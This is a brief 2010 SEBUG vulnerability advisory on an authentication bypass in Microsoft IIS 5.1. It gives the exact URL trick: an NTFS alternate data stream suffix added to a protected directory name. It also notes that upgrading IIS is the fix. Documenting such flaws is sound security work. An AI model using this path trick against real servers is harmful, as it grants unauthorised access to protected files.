Microsoft IIS 5.1
Microsoft IIS 5.1 Directory Authentication Bypass
SEBUG-ID:19902
SEBUG-Appdir:Microsoft IIS
Published:2010-07-02
author:ICT (ictbh2_at_hotmail.com)
Vulnerable:
Discription:
Introduction: Although IIS5 is very old, finding one is not impossible! Therefore, I want to introduce a technique to bypass the IIS authentication methods on a directory. This vulnerability is because of using Alternate Data Stream to open a protected folder. All of IIS authentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication. It is possible to run “secretfile.asp” by using: “/AuthNeeded:$i30:$INDEX_ALLOCATION/secretfile.asp” Instead of: “/AuthNeeded/secretfile.asp”
<*References
ICTBH@Hotmail.com*>
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
It is possible to run “secretfile.asp” by using: “/AuthNeeded:$i30:$INDEX_ALLOCATION/secretfile.asp” Instead of: “/AuthNeeded/secretfile.asp”
SEBUG Solution:
update to IIS 6.0 and Or higher Microsoft --------- http://www.microsoft.com/
// sebug.net [2010-07-02]